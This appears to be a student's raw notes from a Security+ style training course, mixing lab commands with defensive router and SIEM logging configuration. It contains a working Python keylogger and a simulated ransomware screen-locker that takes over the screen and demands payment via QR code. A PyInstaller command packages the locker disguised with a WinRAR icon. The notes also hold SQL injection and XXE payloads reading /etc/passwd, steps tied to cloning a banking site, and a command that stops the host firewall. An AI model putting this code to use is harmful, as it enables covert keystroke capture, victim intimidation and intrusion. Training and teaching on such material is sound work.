DAY 1 - Physical

C:\Users\Administrator>cd desktop

C:\Users\Administrator\Desktop>mkdir JR

C:\Users\Administrator\Desktop>cd Jr

C:\Users\Administrator\Desktop\JR>git clone https://github.com/Oyadz/SECplus701
Cloning into 'SECplus701'...
remote: Enumerating objects: 408, done.
remote: Counting objects: 100% (201/201), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 408 (delta 197), reused 186 (delta 186), pack-reused 207 (from 1)
Receiving objects: 100% (408/408), 200.25 KiB | 1.42 MiB/s, done.
Resolving deltas: 100% (237/237), done.
warning: the following paths have collided (e.g. case-sensitive paths
on a case-insensitive filesystem) and only one from the same
colliding group is in the working tree:

DAY 2 - DNS / Website Cloning
mmc
Remove-Item "IIS:\SslBindings\0.0.0.0!443!www.bdo.ph.com"

Remove-WebBinding -Name "bdo.ph.com" -Protocol https -Port 443 -HostHeader "www.bdo.ph.com"

Remove-Item "IIS:\SslBindings\!443!www.bdo.ph.com" -Force

iisreset

Sudo su

sudo /opt/lampp/lampp start

sudo systemctl stop apache2

http://192.168.186.___/mutillidae/src/index.php
OWAS
' OR '1'='1

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

DAY 3 - Pentesting / Hacking
cd /home/rivan/pentbox-1.8
./pentbox.rb
nmap -v 192.168.101.186
ctrl+Shift+P

KEY LOGGER
from pynput import keyboard
import os
import logging
from datetime import datetime

# Ensure logs folder exists
os.makedirs("logs", exist_ok=True)

# Log file with timestamp
log_file = f"logs/keylog_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.txt"
logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s: %(message)s')

# Capture key strokes
def on_press(key):
    try:
        logging.info(f"Key: {key.char}")
    except AttributeError:
        logging.info(f"Special: {key}")

# Start keylogger
with keyboard.Listener(on_press=on_press) as listener:
    listener.join()

RANSOMWARE
import os
import sys
import time
import json
import random
import datetime
from threading import Thread
from PIL import Image, ImageTk
import tkinter as tk
from tkinter import messagebox
import winsound


def resource_path(filename):
    if getattr(sys, "frozen", False):
        base_path = sys._MEIPASS
    else:
        base_path = os.path.dirname(os.path.abspath(__file__))
    return os.path.join(base_path, filename)


VICTIM_ID = f"SIM-{random.randint(10000, 99999)}"
DURATION = 90

QR_IMAGE = resource_path("qrc (2).jpg")
ALARM_WAV = resource_path("alert.wav")

EVIDENCE_DIR = os.path.join(os.getcwd(), "sim_evidence")
os.makedirs(EVIDENCE_DIR, exist_ok=True)


def generate_iocs():
    ts = datetime.datetime.now().isoformat()
    return [
        {"time": ts, "type": "process", "detail": "ransomware.exe (simulated)"},
        {"time": ts, "type": "file", "detail": "Resume.docx.locked"},
        {"time": ts, "type": "file", "detail": "Vacation.jpg.locked"},
        {"time": ts, "type": "network", "detail": "beacon → 10.10.10.10"}
    ]


def save_iocs(iocs):
    path = os.path.join(EVIDENCE_DIR, f"evidence_{int(time.time())}.json")
    with open(path, "w", encoding="utf-8") as f:
        json.dump({
            "victim_id": VICTIM_ID,
            "generated": datetime.datetime.now().isoformat(),
            "iocs": iocs,
            "note": "Simulation only"
        }, f, indent=2)
    return path


def play_alarm():
    if os.path.exists(ALARM_WAV):
        winsound.PlaySound(
            ALARM_WAV,
            winsound.SND_FILENAME | winsound.SND_ASYNC | winsound.SND_LOOP
        )


def stop_alarm():
    winsound.PlaySound(None, winsound.SND_PURGE)


def launch_gui():
    root = tk.Tk()
    root.title("Security Alert")
    root.attributes("-fullscreen", True)
    root.attributes("-topmost", True)
    root.overrideredirect(True)
    root.configure(bg="#4b0000")

    play_alarm()

    def keep_focus():
        while True:
            try:
                root.focus_force()
                root.lift()
            except:
                break
            time.sleep(0.4)

    Thread(target=keep_focus, daemon=True).start()

    canvas = tk.Canvas(root, bg="#4b0000", highlightthickness=0)
    canvas.pack(fill="both", expand=True)

    sw, sh = root.winfo_screenwidth(), root.winfo_screenheight()
    card_w, card_h = 520, 430

    card = tk.Frame(canvas, bg="#e00012")
    canvas.create_window(
        sw // 2,
        sh // 2,
        window=card,
        width=card_w,
        height=card_h
    )

    header = tk.Frame(card, bg="#ff0020", height=150)
    header.pack(fill="x")

    icon = tk.Canvas(header, width=90, height=90, bg="#ff0020", highlightthickness=0)
    icon.pack(pady=18)
    icon.create_polygon(45, 6, 84, 78, 6, 78, fill="white")
    icon.create_text(45, 56, text="!", fill="black", font=("Segoe UI", 32, "bold"))

    tk.Label(
        header,
        text="You've Been Hacked!",
        bg="#ff0020",
        fg="white",
        font=("Segoe UI", 22, "bold")
    ).pack()

    body = tk.Frame(card, bg="#d10014")
    body.pack(fill="both", expand=True, padx=30, pady=20)

    tk.Label(
        body,
        text="Your files have been encrypted.\nScan the QR code below to restore access.",
        bg="#d10014",
        fg="#ffecec",
        font=("Segoe UI", 12),
        justify="center"
    ).pack(pady=(0, 14))

    if os.path.exists(QR_IMAGE):
        img = Image.open(QR_IMAGE).resize((160, 160), Image.LANCZOS)
        qr = ImageTk.PhotoImage(img)
        lbl = tk.Label(body, image=qr, bg="#d10014")
        lbl.image = qr
        lbl.pack()
    else:
        tk.Label(
            body,
            text="QR CODE NOT FOUND",
            fg="white",
            bg="#d10014",
            font=("Segoe UI", 12, "bold")
        ).pack(pady=40)

    status = tk.Label(
        body,
        text="Awaiting payment...",
        bg="#d10014",
        fg="#ffd16a",
        font=("Consolas", 11)
    )
    status.pack(pady=12)

    def ok_action():
        messagebox.showwarning(
            "Payment Required",
            "No payment detected.\nFiles remain encrypted."
        )

    tk.Button(
        body,
        text="OK",
        command=ok_action,
        bg="#ff4a4a",
        fg="black",
        activebackground="#ff6b6b",
        relief="flat",
        font=("Segoe UI", 12, "bold"),
        width=10,
        pady=6
    ).pack(pady=6)

    def countdown():
        start = time.time()
        while time.time() - start < DURATION:
            remaining = int(DURATION - (time.time() - start))
            status.config(text=f"Time remaining: {remaining}s")
            time.sleep(1)

        status.config(text="Deadline expired. Files lost.")
        stop_alarm()

    Thread(target=countdown, daemon=True).start()

    root.mainloop()


if __name__ == "__main__":
    launch_gui()

pyinstaller --onefile --windowed --icon=winrar.ico --add-data "QRC.jpg;." --add-data "alert.wav;." Money.py
VS Code

SIEM https://wazuh.com/
XDR
LOGS ELK STACK
ipp addr
sudo systemctl stop firewalld

https://www.librenms.org/#features
ELK
http://208.8.8.133:5601/

logging on
logging host 208.8.8.133 transport udp port 9001
logging trap informational
end

config t
login on-failure
login on-success log
end

conf t
login on-failure log
login on-succes log
end
-------------------------------------------------
conf t
access-list 100 deny ip any host 208.8.8.111 log
access-list 100 permit ip any any
int g1
ip access-group 100 in
end
-------------------------------------------------
para mmaayos ulit
conf t
int g1
no ip  access-group 100 in
end

config t
NO ip access-list standard NOPORN
ip access-list standard NOPORN
DENY 66.254.0.0 0.0.255.255  log
deny 161.49.0.0 0.0.255.255  log
DENY 104.21.0.0 0.0.255.255  log
DENY 68.235.0.0 0.0.255.255  log
DENY 104.17.0.0 0.0.255.255  log
DENY 88.208.0.0 0.0.255.255  log
DENY 208.77.0.0 0.0.255.255  log
DENY 172.67.0.0 0.0.255.255  log
DENY 172.66.0.0 0.0.255.255  log
DENY 162.159.0.0 0.0.255.255 log
Permit Any
Int Gi 1
 ip access-group NOPORN in
end
